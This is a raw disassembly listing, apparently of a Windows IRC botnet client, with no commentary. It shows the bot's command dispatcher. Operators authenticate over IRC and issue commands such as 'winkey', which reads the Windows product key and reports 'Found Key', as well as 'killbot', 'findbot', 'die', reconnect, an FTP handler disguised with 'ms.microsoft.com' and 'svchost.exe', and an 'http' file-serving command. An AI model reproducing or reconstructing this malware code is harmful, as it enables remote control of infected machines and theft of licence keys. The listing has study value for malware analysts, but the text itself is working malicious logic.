loc_401B67: ; CODE XREF: sub_40198E+611�j
; sub_40198E+82F�j ...
push [ebp+arg_4]
call sub_401760
jmp loc_404159
; ---------------------------------------------------------------------------
loc_401B74: ; CODE XREF: sub_40198E+1AB�j
push edi
push offset aNotice ; "NOTICE"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_401BBD
cmp [ebp+var_70], ebx
jz loc_401C32
push [ebp+var_74]
push offset aPong ; "pong"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_401C32
push [ebp+var_70]
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_40170D
add esp, 0Ch
cmp [ebp+arg_20], ebx
jmp short loc_401B56
; ---------------------------------------------------------------------------
loc_401BBD: ; CODE XREF: sub_40198E+1F5�j
push edi
push offset a001 ; "001"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz loc_40476B
push edi
push offset a005 ; "005"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz loc_40476B
push edi
push offset a302 ; "302"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_401C3A
push offset a@ ; "@"
push [ebp+var_AC]
call sub_40D810
cmp eax, ebx
pop ecx
pop ecx
jz short loc_401C32
lea esi, [eax+1]
push 9Fh
push esi
push [ebp+arg_1C]
call sub_40DB80
push 0FFh
push esi
push offset dword_4B97D8
call sub_40DB80
add esp, 18h
loc_401C32: ; CODE XREF: sub_40198E+D9�j
; sub_40198E+E7�j ...
xor eax, eax
inc eax
loc_401C35: ; CODE XREF: sub_40198E+CD5�j
; sub_40198E+F49�j ...
pop edi
loc_401C36: ; CODE XREF: sub_40198E+4C�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_401C3A: ; CODE XREF: sub_40198E+268�j
push edi
push offset a433 ; "433"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_401C8E
push 1Ch
lea eax, [ebp+var_D4]
push ebx
push eax
call sub_40D7B0
xor eax, eax
mov al, byte_41E138
push ebx
push eax
push dword_41E140
lea eax, [ebp+var_D4]
push eax
call sub_409C91
lea eax, [ebp+var_D4]
push eax
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_407C1D
add esp, 28h
jmp short loc_401C32
; ---------------------------------------------------------------------------
loc_401C8E: ; CODE XREF: sub_40198E+2BB�j
mov esi, [ebp+arg_18]
push 3
mov [ebp+var_28], ebx
pop edi
loc_401C97: ; CODE XREF: sub_40198E+32A�j
lea eax, [ebp+var_C44]
push eax
push esi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_401CB1
mov [ebp+var_28], 1
loc_401CB1: ; CODE XREF: sub_40198E+31A�j
add esi, 80h
dec edi
jnz short loc_401C97
mov edi, [ebp+var_B4]
push edi
push offset aKick ; "KICK"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_401DC3
mov esi, [ebp+arg_18]
push 3
pop edi
loc_401CDB: ; CODE XREF: sub_40198E+3CE�j
cmp [esi], bl
jz short loc_401D55
push 7Fh
lea eax, [ebp+var_C44]
push esi
push eax
call sub_40DB80
add esp, 0Ch
cmp [ebp+var_AC], ebx
jz short loc_401D55
push [ebp+var_AC]
lea eax, [ebp+var_F0]
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_401D55
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_814]
push offset aUserSLoggedOut ; "user %s logged out."
push eax
mov [esi], bl
call sub_40D6BB
lea eax, [ebp+var_814]
push eax
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_401760
lea eax, [ebp+var_814]
push eax
call sub_401648
add esp, 20h
loc_401D55: ; CODE XREF: sub_40198E+34F�j
; sub_40198E+369�j ...
add esi, 80h
dec edi
jnz loc_401CDB
push [ebp+var_AC]
push [ebp+arg_10]
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_401C32
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_401760
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_814]
push offset aNiceGameMrS ; "Nice Game Mr %s!"
push eax
call sub_40D6BB
push ebx
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push [ebp+arg_4]
call sub_4017B6
add esp, 2Ch
jmp loc_401C32
; ---------------------------------------------------------------------------
loc_401DC3: ; CODE XREF: sub_40198E+341�j
push edi
push offset aNick ; "NICK"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_401EA3
mov esi, [ebp+var_B0]
inc esi
cmp esi, ebx
mov [ebp+arg_0], esi
jz loc_401C32
push [ebp+arg_10]
lea eax, [ebp+var_F0]
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_401E0F
push 0Fh
push esi
push [ebp+arg_10]
call sub_40DB80
jmp loc_402B81
; ---------------------------------------------------------------------------
loc_401E0F: ; CODE XREF: sub_40198E+46F�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_401E14: ; CODE XREF: sub_40198E+4A7�j
cmp [edi], bl
jz short loc_401E2B
lea eax, [ebp+var_C44]
push eax
push edi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_401E3C
loc_401E2B: ; CODE XREF: sub_40198E+488�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_401E14
jmp loc_401C32
; ---------------------------------------------------------------------------
loc_401E3C: ; CODE XREF: sub_40198E+49B�j
lea eax, [ebp+var_C44]
push 21h
push eax
call sub_40E120
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_18], eax
jz loc_401C32
push eax
call sub_40D630
push [ebp+arg_0]
mov edi, eax
call sub_40D630
add edi, eax
cmp edi, 7Eh
pop ecx
pop ecx
ja loc_401C32
push [ebp+var_18]
shl esi, 7
push [ebp+arg_0]
add esi, [ebp+arg_18]
push offset aSS_0 ; ":%s%s"
push esi
call sub_40D6BB
push ebx
lea eax, [ebp+var_154]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4017B6
jmp loc_402ED6
; ---------------------------------------------------------------------------
loc_401EA3: ; CODE XREF: sub_40198E+444�j
push edi
push offset aPart ; "PART"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_401EC5
push edi
push offset aQuit ; "QUIT"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_401EF2
loc_401EC5: ; CODE XREF: sub_40198E+524�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_401ECA: ; CODE XREF: sub_40198E+55C�j
cmp [edi], bl
jz short loc_401EE0
push [ebp+var_B8]
push edi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_401F43
loc_401EE0: ; CODE XREF: sub_40198E+53E�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_401ECA
mov edi, [ebp+var_B4]
loc_401EF2: ; CODE XREF: sub_40198E+535�j
push edi
push offset a353 ; "353"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_401FA4
push [ebp+var_A8]
push [ebp+arg_8]
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_401F24
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_401F24: ; CODE XREF: sub_40198E+58B�j
push [ebp+var_A8]
lea eax, [ebp+var_814]
push offset aJ0in3dChannelS ; "j0in3d channel %s."
push eax
call sub_40D6BB
add esp, 0Ch
jmp loc_402B00
; ---------------------------------------------------------------------------
loc_401F43: ; CODE XREF: sub_40198E+550�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_814]
push offset aUserSLoggedOut ; "user %s logged out."
push eax
call sub_40D6BB
lea eax, [ebp+var_814]
push eax
call sub_401648
push [ebp+var_B4]
push offset aPart ; "PART"
call sub_40D720
add esp, 18h
test eax, eax
jnz loc_401C32
lea eax, [ebp+var_814]
push eax
mov eax, [ebp+var_B8]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_401B67
; ---------------------------------------------------------------------------
loc_401FA4: ; CODE XREF: sub_40198E+573�j
push edi
mov esi, offset aPrivmsg ; "PRIVMSG"
push esi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_401FF0
push edi
mov edi, offset aNotice ; "NOTICE"
push edi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_401FF5
push [ebp+var_B4]
push offset a332 ; "332"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_402660
cmp dword_41E12C, ebx
jz loc_402660
jmp short loc_401FF5
; ---------------------------------------------------------------------------
loc_401FF0: ; CODE XREF: sub_40198E+626�j
mov edi, offset aNotice ; "NOTICE"
loc_401FF5: ; CODE XREF: sub_40198E+638�j
; sub_40198E+660�j
push [ebp+var_B4]
push esi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz loc_4020DA
push [ebp+var_B4]
push edi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz loc_4020DA
mov eax, [ebp+var_AC]
inc [ebp+var_A8]
push 4
pop esi
mov [ebp+var_20], esi
mov [ebp+var_B0], eax
loc_402039: ; CODE XREF: sub_40198E+80B�j
; sub_40198E+843�j ...
mov edi, esi
shl edi, 2
lea ecx, [ebp+edi+var_B8]
mov eax, [ecx]
lea edx, [eax+1]
mov al, [eax]
cmp al, byte_41E338
mov [ebp+var_1C], edi
mov [ebp+var_8], edx
mov [ecx], edx
jnz loc_401C32
push edx
push offset aS_4 ; ""
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_4022A4
mov edi, [ebp+edi+var_B4]
cmp edi, ebx
mov [ebp+var_C], edi
jz loc_401C32
push offset asc_419D48 ; "!"
push [ebp+var_B8]
call sub_40E1DE
mov edi, eax
push offset dword_419388
push ebx
inc edi
call sub_40E1DE
push [ebp+var_C]
mov esi, eax
push offset aS_2 ; "s"
mov [ebp+var_18], esi
call sub_40D720
add esp, 18h
test eax, eax
push esi
jz loc_402201
loc_4020C3: ; CODE XREF: sub_40198E+87E�j
push edi
lea eax, [ebp+var_814]
push offset aFailedAuthSS_ ; "*failed auth %s(%s)."
push eax
call sub_40D6BB
jmp loc_402AFD
; ---------------------------------------------------------------------------
loc_4020DA: ; CODE XREF: sub_40198E+677�j
; sub_40198E+68D�j
push [ebp+var_B4]
push edi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_4020F3
mov [ebp+var_4], 1
loc_4020F3: ; CODE XREF: sub_40198E+75C�j
cmp [ebp+var_B0], ebx
jz loc_401C32
push offset dword_419C64
push [ebp+var_B0]
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_40211A
cmp [ebp+var_4], ebx
jz short loc_402126
loc_40211A: ; CODE XREF: sub_40198E+785�j
lea eax, [ebp+var_F0]
mov [ebp+var_B0], eax
loc_402126: ; CODE XREF: sub_40198E+78A�j
cmp [ebp+var_AC], ebx
jz loc_401C32
inc [ebp+var_AC]
jz short loc_402178
mov esi, [ebp+arg_10]
cmp esi, ebx
jz short loc_402178
push esi
call sub_40D630
push eax
push [ebp+var_AC]
push esi
call sub_40E0D0
push esi
call sub_40D630
push eax
push [ebp+var_AC]
push esi
call sub_40E0D0
add esp, 20h
mov esi, eax
neg esi
sbb esi, esi
add esi, 4
mov [ebp+var_20], esi
jmp short loc_40217B
; ---------------------------------------------------------------------------
loc_402178: ; CODE XREF: sub_40198E+7AA�j
; sub_40198E+7B1�j
mov esi, [ebp+var_20]
loc_40217B: ; CODE XREF: sub_40198E+7E8�j
mov edi, [ebp+esi*4+var_B8]
cmp edi, ebx
jz loc_401C32
push edi
push offset dword_419C58
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_402039
mov eax, [ebp+var_B0]
cmp byte ptr [eax], 23h
jz short loc_4021C2
cmp byte_41E0E0, bl
jz short loc_4021C2
push offset byte_41E0E0
push eax
push offset dword_419C3C
jmp loc_401B67
; ---------------------------------------------------------------------------
loc_4021C2: ; CODE XREF: sub_40198E+81A�j
; sub_40198E+822�j
push edi
push offset dword_419C34
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_402039
mov eax, [ebp+esi*4+var_B4]
cmp eax, ebx
jz loc_402039
mov ecx, [ebp+var_B0]
cmp byte ptr [ecx], 23h
jz loc_402039
push eax
push ecx
push offset dword_419C1C
jmp loc_401B67
; ---------------------------------------------------------------------------
loc_402201: ; CODE XREF: sub_40198E+72F�j
call sub_406C24
test eax, eax
pop ecx
jnz short loc_402211
push esi
jmp loc_4020C3
; ---------------------------------------------------------------------------
loc_402211: ; CODE XREF: sub_40198E+87B�j
mov eax, [ebp+arg_18]
xor esi, esi
mov [ebp+arg_0], eax
loc_402219: ; CODE XREF: sub_40198E+8B0�j
mov eax, [ebp+arg_0]
cmp [eax], bl
jnz short loc_402233
push [ebp+var_C]
push offset aS_2 ; "s"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_402245
loc_402233: ; CODE XREF: sub_40198E+890�j
add [ebp+arg_0], 80h
inc esi
cmp esi, 3
jl short loc_402219
jmp loc_401C32
; ---------------------------------------------------------------------------
loc_402245: ; CODE XREF: sub_40198E+8A3�j
push 7Fh
lea eax, [ebp+var_C44]
shl esi, 7
add esi, [ebp+arg_18]
push eax
push esi
call sub_40DB80
add esp, 0Ch
cmp [ebp+var_10], ebx
jnz short loc_40227B
push [ebp+var_4]
push offset aOkYouReHere_ ; "Ok You're Here."
push [ebp+var_B0]
push [ebp+arg_4]
call sub_4017B6
add esp, 10h
loc_40227B: ; CODE XREF: sub_40198E+8D2�j
push [ebp+var_18]
lea eax, [ebp+var_814]
push edi
push offset aUserSSLoggedIn ; "user %s(%s) logged in."
push eax
call sub_40D6BB
lea eax, [ebp+var_814]
push eax
call sub_401648
add esp, 14h
jmp loc_401C32
; ---------------------------------------------------------------------------
loc_4022A4: ; CODE XREF: sub_40198E+6E1�j
cmp [ebp+var_28], ebx
jnz short loc_4022C3
push [ebp+var_B4]
push offset a332 ; "332"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_402660
loc_4022C3: ; CODE XREF: sub_40198E+919�j
xor esi, esi
cmp dword_41E334, ebx
jle loc_402443
mov [ebp+var_C], offset dword_4B8850
loc_4022D8: ; CODE XREF: sub_40198E+969�j
push [ebp+var_8]
push [ebp+var_C]
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_4022FE
add [ebp+var_C], 0B8h
inc esi
cmp esi, dword_41E334
jl short loc_4022D8
jmp loc_402443
; ---------------------------------------------------------------------------
loc_4022FE: ; CODE XREF: sub_40198E+959�j
push offset asc_419D50 ; " :"
push [ebp+arg_0]
call sub_40D810
cmp eax, ebx
pop ecx
pop ecx
jz loc_401C32
mov cl, byte_41E338
imul esi, 0B8h
mov [eax+2], cl
mov cl, byte_41E338
mov [eax+3], cl
push 9Fh
lea ecx, dword_4B8868[esi]
push ecx
add eax, 4
push eax
call sub_40DB80
lea eax, dword_4B8850[esi]
add esp, 0Ch
mov [ebp+var_C], 0Fh
mov [ebp+var_18], eax
lea esi, [ebp+edi+var_78]
loc_402359: ; CODE XREF: sub_40198E+A56�j
push [ebp+var_C]
lea eax, [ebp+var_38]
push offset aD_0 ; "$%d-"
push eax
call sub_40D6BB
lea eax, [ebp+var_38]
push eax
push [ebp+arg_0]
call sub_40D810
add esp, 14h
test eax, eax
jz short loc_4023B2
cmp [esi], ebx
jz short loc_4023B6
push [ebp+var_18]
call sub_40D630
add [ebp+var_14], eax
pop ecx
jz short loc_4023DB
push dword ptr [esi-4]
push [ebp+var_14]
call sub_40D810
cmp eax, ebx
pop ecx
pop ecx
jz short loc_4023DB
push eax
lea eax, [ebp+var_38]
push eax
push [ebp+arg_0]
call sub_401822
add esp, 0Ch
jmp short loc_4023DB
; ---------------------------------------------------------------------------
loc_4023B2: ; CODE XREF: sub_40198E+9ED�j
cmp [esi], ebx
jnz short loc_4023DB
loc_4023B6: ; CODE XREF: sub_40198E+9F1�j
push 2
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_40DB80
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_38]
push eax
push [ebp+arg_0]
mov [ebp+var_2A], bl
call sub_401822
add esp, 18h
loc_4023DB: ; CODE XREF: sub_40198E+9FF�j
; sub_40198E+A10�j ...
dec [ebp+var_C]
sub esi, 4
cmp [ebp+var_C], ebx
jg loc_402359
lea eax, [ebp+edi+var_78]
mov [ebp+var_C], 10h
mov esi, eax
loc_4023F7: ; CODE XREF: sub_40198E+AAC�j
push [ebp+var_C]
lea eax, [ebp+var_38]
push offset aD ; "$%d"
push eax
call sub_40D6BB
lea eax, [ebp+var_38]
push eax
push [ebp+arg_0]
call sub_40D810
add esp, 14h
test eax, eax
jz short loc_402431
mov eax, [esi]
cmp eax, ebx
jz short loc_402431
push eax
lea eax, [ebp+var_38]
push eax
push [ebp+arg_0]
call sub_401822
add esp, 0Ch
loc_402431: ; CODE XREF: sub_40198E+A8B�j
; sub_40198E+A91�j
dec [ebp+var_C]
sub esi, 4
cmp [ebp+var_C], ebx
jg short loc_4023F7
mov [ebp+var_18], 1
loc_402443: ; CODE XREF: sub_40198E+93D�j
; sub_40198E+96B�j
mov eax, [ebp+var_8]
mov al, [eax]
cmp al, byte_41E338
jz short loc_402459
cmp [ebp+var_18], ebx
jz loc_40260B
loc_402459: ; CODE XREF: sub_40198E+AC0�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe ; "$me"
push edi
call sub_401822
lea eax, [ebp+var_F0]
push eax
push offset aUser ; "$user"
push edi
call sub_401822
push [ebp+var_B0]
push offset aChan ; "$chan"
push edi
call sub_401822
push ebx
push ebx
lea eax, [ebp+var_38]
push ebx
push eax
call sub_409C91
push eax
push offset aRndnick ; "$rndnick"
push edi
call sub_401822
add esp, 40h
push [ebp+arg_14]
push offset aServer_0 ; "$server"
push edi
call sub_401822
mov esi, offset aChr ; "$chr("
push esi
push edi
call sub_40D810
add esp, 14h
jmp loc_40258A
; ---------------------------------------------------------------------------
loc_4024CA: ; CODE XREF: sub_40198E+BFE�j
push esi
push [ebp+arg_0]
call sub_40D810
mov edi, eax
push 4
lea eax, [edi+5]
push eax
lea eax, [ebp+var_38]
push eax
call sub_40DB80
lea eax, [ebp+var_38]
push offset asc_419BB4 ; ")"
push eax
call sub_40E1DE
add esp, 1Ch
cmp [ebp+var_38], 30h
jl short loc_402501
cmp [ebp+var_38], 39h
jle short loc_402514
loc_402501: ; CODE XREF: sub_40198E+B6B�j
push 3
lea eax, [ebp+var_38]
push offset a63 ; "63"
push eax
call sub_40DB80
add esp, 0Ch
loc_402514: ; CODE XREF: sub_40198E+B71�j
lea eax, [ebp+var_38]
push eax
call sub_40E0C8
test eax, eax
pop ecx
jle short loc_402531
lea eax, [ebp+var_38]
push eax
call sub_40E0C8
pop ecx
mov [ebp+var_2C], al
jmp short loc_402542
; ---------------------------------------------------------------------------
loc_402531: ; CODE XREF: sub_40198E+B92�j
call sub_40E04D
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_2C], dl
loc_402542: ; CODE XREF: sub_40198E+BA1�j
lea eax, [ebp+var_38]
push eax
mov [ebp+var_2B], bl
call sub_40D630
push 0Ch
mov [ebp+var_18], eax
lea eax, [ebp+var_38]
push ebx
push eax
call sub_40D7B0
mov eax, [ebp+var_18]
add eax, 6
push eax
lea eax, [ebp+var_38]
push edi
push eax
call sub_40DB80
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_38]
push eax
push [ebp+arg_0]
call sub_401822
push esi
push [ebp+arg_0]
call sub_40D810
add esp, 30h
loc_40258A: ; CODE XREF: sub_40198E+B37�j
test eax, eax
jnz loc_4024CA
mov esi, 3FFh
push esi
push [ebp+arg_0]
lea eax, [ebp+var_1044]
push eax
call sub_40DB80
push esi
lea eax, [ebp+var_1044]
push eax
lea eax, [ebp+var_1444]
push eax
call sub_40DB80
mov esi, offset asc_419D4C ; " "
lea eax, [ebp+var_1444]
push esi
push eax
call sub_40E1DE
xor edi, edi
add esp, 20h
mov [ebp+var_B8], eax
inc edi
loc_4025D9: ; CODE XREF: sub_40198E+C5F�j
push esi
push ebx
call sub_40E1DE
mov [ebp+edi*4+var_B8], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_4025D9
mov eax, [ebp+var_1C]
lea eax, [ebp+eax+var_B8]
mov ecx, [eax]
cmp ecx, ebx
jz loc_401C32
mov edi, [ebp+var_1C]
add ecx, 3
mov [eax], ecx
loc_40260B: ; CODE XREF: sub_40198E+AC5�j
mov eax, [ebp+edi+var_B8]
push eax
push offset aRnick ; "rnick"
mov [ebp+var_8], eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_402668
cmp [ebp+var_3A4], bl
push [ebp+edi+var_B4]
setnz al
push eax
push dword_41E140
lea eax, [ebp+var_314]
push eax
call sub_409C91
lea eax, [ebp+var_314]
push eax
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_407C1D
loc_40265D: ; CODE XREF: sub_40198E+20DC�j
add esp, 1Ch
loc_402660: ; CODE XREF: sub_40198E+64E�j
; sub_40198E+65A�j ...
mov eax, [ebp+arg_24]
jmp loc_401C35
; ---------------------------------------------------------------------------
loc_402668: ; CODE XREF: sub_40198E+C96�j
push [ebp+var_8]
push offset aWinkey ; "winkey"
call sub_40D720
test eax, eax
mov esi, [ebp+arg_4]
pop ecx
pop ecx
jnz loc_402778
lea eax, [ebp+var_D8]
push 1
push eax
call sub_407C63
test eax, eax
pop ecx
pop ecx
jz loc_402744
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_814]
push offset aFoundKey_29s ; "Found Key: %.29s"
push eax
call sub_40D6BB
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push esi
call sub_4017B6
add esp, 1Ch
loc_4026CB: ; CODE XREF: sub_40198E+DB9�j
; sub_40198E+DE5�j ...
push [ebp+var_8]
push offset aKillbot ; "killbot"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_402703
cmp [ebp+var_10], ebx
jnz short loc_4026FC
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push esi
call sub_4017B6
add esp, 10h
loc_4026FC: ; CODE XREF: sub_40198E+D53�j
push esi
call sub_4012BA
pop ecx
loc_402703: ; CODE XREF: sub_40198E+D4E�j
push [ebp+var_8]
push offset aFindbot ; "findbot"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_402E9E
cmp [ebp+var_10], ebx
jnz short loc_402738
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push esi
call sub_4017B6
add esp, 10h
loc_402738: ; CODE XREF: sub_40198E+D8F�j
push esi
call sub_40151D
loc_40273E: ; CODE XREF: sub_40198E+1DDD�j
; sub_40198E+200C�j
pop ecx
jmp loc_402660
; ---------------------------------------------------------------------------
loc_402744: ; CODE XREF: sub_40198E+D06�j
cmp [ebp+var_10], ebx
jnz short loc_4026CB
lea eax, [ebp+var_814]
push offset aCouldnTFindKey ; "Couldn't find Key"
push eax
call sub_40D6BB
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push esi
call sub_4017B6
add esp, 18h
jmp loc_4026CB
; ---------------------------------------------------------------------------
loc_402778: ; CODE XREF: sub_40198E+CEE�j
push [ebp+var_8]
push offset aDie ; "die"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_4027AA
push [ebp+var_B4]
push offset a332 ; "332"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz loc_4026CB
jmp loc_402E98
; ---------------------------------------------------------------------------
loc_4027AA: ; CODE XREF: sub_40198E+DFB�j
push [ebp+var_8]
push offset aLogout ; "logout"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_40283A
mov eax, [ebp+arg_18]
mov [ebp+var_C], eax
mov [ebp+var_18], 3
loc_4027CA: ; CODE XREF: sub_40198E+EA5�j
push [ebp+var_B8]
push [ebp+var_C]
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_402829
mov eax, [ebp+var_C]
mov [eax], bl
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_814]
push offset aUserSLoggedO_0 ; "user %s logged out.\r\n"
push eax
call sub_40D6BB
add esp, 0Ch
cmp [ebp+var_10], ebx
jnz short loc_40281C
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push esi
call sub_4017B6
add esp, 10h
loc_40281C: ; CODE XREF: sub_40198E+E73�j
lea eax, [ebp+var_814]
push eax
call sub_401648
pop ecx
loc_402829: ; CODE XREF: sub_40198E+E4E�j
add [ebp+var_C], 80h
dec [ebp+var_18]
jnz short loc_4027CA
jmp loc_4026CB
; ---------------------------------------------------------------------------
loc_40283A: ; CODE XREF: sub_40198E+E2D�j
push [ebp+var_8]
push offset aGftp ; "gftp"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_4028B3
push offset aSvchost_exe ; "svchost.exe"
push offset aPassword ; "password"
push offset aMircosoft ; "mircosoft"
push dword_41E264
mov esi, 400h
push offset aMs_microsoft_c ; "ms.microsoft.com"
push offset aCftpServerSPor ; "CFTP server: %s, port: %d, user: %s, pa"...
lea eax, [ebp+var_814]
push esi
push eax
call sub_40DFEC
add esp, 20h
cmp [ebp+var_10], ebx
jnz short loc_4028A0
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push offset dword_41E1A8
push [ebp+arg_4]
call sub_4017B6
add esp, 10h
loc_4028A0: ; CODE XREF: sub_40198E+EF6�j
push esi
lea eax, [ebp+var_814]
push ebx
push eax
call sub_40D7B0
jmp loc_402B81
; ---------------------------------------------------------------------------
loc_4028B3: ; CODE XREF: sub_40198E+EBD�j
push [ebp+var_8]
push offset aR_e_c_o_n_n_e_ ; "R.e.c.o.n.n.e.c.t"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_4028DC
push offset aQuitReconnecti ; "QUIT :reconnecting"
push [ebp+arg_4]
call sub_4016B8
pop ecx
pop ecx
xor eax, eax
jmp loc_401C35
; ---------------------------------------------------------------------------
loc_4028DC: ; CODE XREF: sub_40198E+F36�j
push [ebp+var_8]
push offset aD_i_s_c_o_n_n_ ; "d.i.s.c.o.n.n.e.c.t"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_402906
push offset aQuitLater_0 ; "QUIT :later"
push [ebp+arg_4]
call sub_4016B8
pop ecx
pop ecx
or eax, 0FFFFFFFFh
jmp loc_401C35
; ---------------------------------------------------------------------------
loc_402906: ; CODE XREF: sub_40198E+F5F�j
push [ebp+var_8]
push offset aLeave ; "leave"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_402962
mov edi, [ebp+edi+var_B4]
cmp edi, ebx
jnz short loc_402935
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_4016B8
pop ecx
pop ecx
jmp short loc_40295A
; ---------------------------------------------------------------------------
loc_402935: ; CODE XREF: sub_40198E+F94�j
cmp [ebp+var_14], ebx
jz short loc_40295A
push edi
push [ebp+var_14]
call sub_40D810
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40295A
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_40170D
add esp, 0Ch
loc_40295A: ; CODE XREF: sub_40198E+FA5�j
; sub_40198E+FAA�j ...
push 0FFFFFFFEh
pop eax
jmp loc_401C35
; ---------------------------------------------------------------------------
loc_402962: ; CODE XREF: sub_40198E+F89�j
push [ebp+var_8]
push offset aHttp ; "http"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_402B1A
mov esi, [ebp+edi+var_B4]
cmp esi, ebx
jz short loc_402998
push esi
call sub_40E0C8
test eax, eax
pop ecx
jz short loc_402998
push esi
call sub_40E0C8
pop ecx
jmp short loc_40299D
; ---------------------------------------------------------------------------
loc_402998: ; CODE XREF: sub_40198E+FF4�j
; sub_40198E+FFF�j
mov eax, dword_41E178
loc_40299D: ; CODE XREF: sub_40198E+1008�j
mov edi, [ebp+edi+var_B0]
mov [ebp+var_834], eax
xor eax, eax
cmp [ebp+var_3B0], bl
setz al
cmp edi, ebx
mov [ebp+var_820], eax
jz short loc_4029D0
lea eax, [ebp+var_938]
push edi
push eax
call sub_40D6BB
pop ecx
pop ecx
jmp short loc_4029FB
; ---------------------------------------------------------------------------
loc_4029D0: ; CODE XREF: sub_40198E+102F�j
push 104h
lea eax, [ebp+var_1F4]
push eax
call dword_4190B4 ; GetSystemDirectoryA
push ebx
push ebx
push ebx
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_1F4]
push eax
call sub_40DEA4
add esp, 14h
loc_4029FB: ; CODE XREF: sub_40198E+1040�j
lea eax, [ebp+var_938]
push eax
call sub_40D630
cmp [ebp+eax+var_939], 5Ch
pop ecx
jnz short loc_402A26
lea eax, [ebp+var_938]
push eax
call sub_40D630
pop ecx
mov [ebp+eax+var_939], bl
loc_402A26: ; CODE XREF: sub_40198E+1082�j
push [ebp+var_B0]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_BC0]
push 80h
push eax
mov [ebp+var_BC4], esi
call sub_40DFEC
mov eax, [ebp+var_4]
mov edi, [ebp+var_10]
add esp, 0Ch
mov [ebp+var_828], eax
lea eax, [ebp+var_938]
push eax
push [ebp+var_834]
mov [ebp+var_824], edi
push esi
call sub_408CE6
pop ecx
push eax
lea eax, [ebp+var_814]
